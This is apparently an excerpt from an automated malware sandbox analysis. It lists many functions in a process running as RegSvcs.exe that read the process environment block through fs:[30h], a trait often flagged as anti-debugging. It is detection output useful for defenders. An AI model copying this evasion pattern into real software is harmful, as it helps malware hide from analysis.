                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98550 mov eax, dword ptr fs:[00000030h]8_2_00F98550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98550 mov eax, dword ptr fs:[00000030h]8_2_00F98550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A4B0 mov eax, dword ptr fs:[00000030h]8_2_0101A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE53E mov eax, dword ptr fs:[00000030h]8_2_00FBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE53E mov eax, dword ptr fs:[00000030h]8_2_00FBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE53E mov eax, dword ptr fs:[00000030h]8_2_00FBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE53E mov eax, dword ptr fs:[00000030h]8_2_00FBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE53E mov eax, dword ptr fs:[00000030h]8_2_00FBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0535 mov eax, dword ptr fs:[00000030h]8_2_00FA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0535 mov eax, dword ptr fs:[00000030h]8_2_00FA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0535 mov eax, dword ptr fs:[00000030h]8_2_00FA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0535 mov eax, dword ptr fs:[00000030h]8_2_00FA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0535 mov eax, dword ptr fs:[00000030h]8_2_00FA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0535 mov eax, dword ptr fs:[00000030h]8_2_00FA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100C730 mov eax, dword ptr fs:[00000030h]8_2_0100C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA6C7 mov ebx, dword ptr fs:[00000030h]8_2_00FCA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA6C7 mov eax, dword ptr fs:[00000030h]8_2_00FCA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC66B0 mov eax, dword ptr fs:[00000030h]8_2_00FC66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014755 mov eax, dword ptr fs:[00000030h]8_2_01014755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC6A6 mov eax, dword ptr fs:[00000030h]8_2_00FCC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E75D mov eax, dword ptr fs:[00000030h]8_2_0101E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94690 mov eax, dword ptr fs:[00000030h]8_2_00F94690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94690 mov eax, dword ptr fs:[00000030h]8_2_00F94690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC2674 mov eax, dword ptr fs:[00000030h]8_2_00FC2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103678E mov eax, dword ptr fs:[00000030h]8_2_0103678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA660 mov eax, dword ptr fs:[00000030h]8_2_00FCA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA660 mov eax, dword ptr fs:[00000030h]8_2_00FCA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010447A0 mov eax, dword ptr fs:[00000030h]8_2_010447A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC640 mov eax, dword ptr fs:[00000030h]8_2_00FAC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010107C3 mov eax, dword ptr fs:[00000030h]8_2_010107C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9262C mov eax, dword ptr fs:[00000030h]8_2_00F9262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC6620 mov eax, dword ptr fs:[00000030h]8_2_00FC6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC8620 mov eax, dword ptr fs:[00000030h]8_2_00FC8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE627 mov eax, dword ptr fs:[00000030h]8_2_00FAE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E7E1 mov eax, dword ptr fs:[00000030h]8_2_0101E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2619 mov eax, dword ptr fs:[00000030h]8_2_00FD2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA260B mov eax, dword ptr fs:[00000030h]8_2_00FA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA260B mov eax, dword ptr fs:[00000030h]8_2_00FA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA260B mov eax, dword ptr fs:[00000030h]8_2_00FA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA260B mov eax, dword ptr fs:[00000030h]8_2_00FA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA260B mov eax, dword ptr fs:[00000030h]8_2_00FA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA260B mov eax, dword ptr fs:[00000030h]8_2_00FA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA260B mov eax, dword ptr fs:[00000030h]8_2_00FA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F947FB mov eax, dword ptr fs:[00000030h]8_2_00F947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F947FB mov eax, dword ptr fs:[00000030h]8_2_00F947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E609 mov eax, dword ptr fs:[00000030h]8_2_0100E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB27ED mov eax, dword ptr fs:[00000030h]8_2_00FB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB27ED mov eax, dword ptr fs:[00000030h]8_2_00FB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB27ED mov eax, dword ptr fs:[00000030h]8_2_00FB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9C7C0 mov eax, dword ptr fs:[00000030h]8_2_00F9C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F907AF mov eax, dword ptr fs:[00000030h]8_2_00F907AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105866E mov eax, dword ptr fs:[00000030h]8_2_0105866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105866E mov eax, dword ptr fs:[00000030h]8_2_0105866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F98770 mov eax, dword ptr fs:[00000030h]8_2_00F98770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0770 mov eax, dword ptr fs:[00000030h]8_2_00FA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90750 mov eax, dword ptr fs:[00000030h]8_2_00F90750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2750 mov eax, dword ptr fs:[00000030h]8_2_00FD2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD2750 mov eax, dword ptr fs:[00000030h]8_2_00FD2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC674D mov esi, dword ptr fs:[00000030h]8_2_00FC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC674D mov eax, dword ptr fs:[00000030h]8_2_00FC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC674D mov eax, dword ptr fs:[00000030h]8_2_00FC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC273C mov eax, dword ptr fs:[00000030h]8_2_00FC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC273C mov ecx, dword ptr fs:[00000030h]8_2_00FC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC273C mov eax, dword ptr fs:[00000030h]8_2_00FC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC720 mov eax, dword ptr fs:[00000030h]8_2_00FCC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC720 mov eax, dword ptr fs:[00000030h]8_2_00FCC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90710 mov eax, dword ptr fs:[00000030h]8_2_00F90710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC0710 mov eax, dword ptr fs:[00000030h]8_2_00FC0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010106F1 mov eax, dword ptr fs:[00000030h]8_2_010106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010106F1 mov eax, dword ptr fs:[00000030h]8_2_010106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E6F2 mov eax, dword ptr fs:[00000030h]8_2_0100E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E6F2 mov eax, dword ptr fs:[00000030h]8_2_0100E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E6F2 mov eax, dword ptr fs:[00000030h]8_2_0100E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E6F2 mov eax, dword ptr fs:[00000030h]8_2_0100E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC700 mov eax, dword ptr fs:[00000030h]8_2_00FCC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]8_2_00FCC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCC8F9 mov eax, dword ptr fs:[00000030h]8_2_00FCC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E908 mov eax, dword ptr fs:[00000030h]8_2_0100E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100E908 mov eax, dword ptr fs:[00000030h]8_2_0100E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101C912 mov eax, dword ptr fs:[00000030h]8_2_0101C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102892B mov eax, dword ptr fs:[00000030h]8_2_0102892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101892A mov eax, dword ptr fs:[00000030h]8_2_0101892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FBE8C0 mov eax, dword ptr fs:[00000030h]8_2_00FBE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064940 mov eax, dword ptr fs:[00000030h]8_2_01064940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01010946 mov eax, dword ptr fs:[00000030h]8_2_01010946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01034978 mov eax, dword ptr fs:[00000030h]8_2_01034978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01034978 mov eax, dword ptr fs:[00000030h]8_2_01034978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101C97C mov eax, dword ptr fs:[00000030h]8_2_0101C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90887 mov eax, dword ptr fs:[00000030h]8_2_00F90887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94859 mov eax, dword ptr fs:[00000030h]8_2_00F94859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F94859 mov eax, dword ptr fs:[00000030h]8_2_00F94859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC0854 mov eax, dword ptr fs:[00000030h]8_2_00FC0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010189B3 mov esi, dword ptr fs:[00000030h]8_2_010189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010189B3 mov eax, dword ptr fs:[00000030h]8_2_010189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010189B3 mov eax, dword ptr fs:[00000030h]8_2_010189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA2840 mov ecx, dword ptr fs:[00000030h]8_2_00FA2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010269C0 mov eax, dword ptr fs:[00000030h]8_2_010269C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCA830 mov eax, dword ptr fs:[00000030h]8_2_00FCA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2835 mov eax, dword ptr fs:[00000030h]8_2_00FB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2835 mov eax, dword ptr fs:[00000030h]8_2_00FB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2835 mov eax, dword ptr fs:[00000030h]8_2_00FB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2835 mov ecx, dword ptr fs:[00000030h]8_2_00FB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2835 mov eax, dword ptr fs:[00000030h]8_2_00FB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2835 mov eax, dword ptr fs:[00000030h]8_2_00FB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105A9D3 mov eax, dword ptr fs:[00000030h]8_2_0105A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E9E0 mov eax, dword ptr fs:[00000030h]8_2_0101E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC29F9 mov eax, dword ptr fs:[00000030h]8_2_00FC29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC29F9 mov eax, dword ptr fs:[00000030h]8_2_00FC29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101C810 mov eax, dword ptr fs:[00000030h]8_2_0101C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC49D0 mov eax, dword ptr fs:[00000030h]8_2_00FC49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103483A mov eax, dword ptr fs:[00000030h]8_2_0103483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103483A mov eax, dword ptr fs:[00000030h]8_2_0103483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F909AD mov eax, dword ptr fs:[00000030h]8_2_00F909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F909AD mov eax, dword ptr fs:[00000030h]8_2_00F909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29A0 mov eax, dword ptr fs:[00000030h]8_2_00FA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01026870 mov eax, dword ptr fs:[00000030h]8_2_01026870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01026870 mov eax, dword ptr fs:[00000030h]8_2_01026870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E872 mov eax, dword ptr fs:[00000030h]8_2_0101E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E872 mov eax, dword ptr fs:[00000030h]8_2_0101E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD096E mov eax, dword ptr fs:[00000030h]8_2_00FD096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD096E mov edx, dword ptr fs:[00000030h]8_2_00FD096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FD096E mov eax, dword ptr fs:[00000030h]8_2_00FD096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB6962 mov eax, dword ptr fs:[00000030h]8_2_00FB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB6962 mov eax, dword ptr fs:[00000030h]8_2_00FB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB6962 mov eax, dword ptr fs:[00000030h]8_2_00FB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101C89D mov eax, dword ptr fs:[00000030h]8_2_0101C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010608C0 mov eax, dword ptr fs:[00000030h]8_2_010608C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F88918 mov eax, dword ptr fs:[00000030h]8_2_00F88918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F88918 mov eax, dword ptr fs:[00000030h]8_2_00F88918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0105A8E4 mov eax, dword ptr fs:[00000030h]8_2_0105A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01064B00 mov eax, dword ptr fs:[00000030h]8_2_01064B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCAAEE mov eax, dword ptr fs:[00000030h]8_2_00FCAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FCAAEE mov eax, dword ptr fs:[00000030h]8_2_00FCAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100EB1D mov eax, dword ptr fs:[00000030h]8_2_0100EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F90AD0 mov eax, dword ptr fs:[00000030h]8_2_00F90AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC4AD0 mov eax, dword ptr fs:[00000030h]8_2_00FC4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FC4AD0 mov eax, dword ptr fs:[00000030h]8_2_00FC4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01058B28 mov eax, dword ptr fs:[00000030h]8_2_01058B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01058B28 mov eax, dword ptr fs:[00000030h]8_2_01058B28
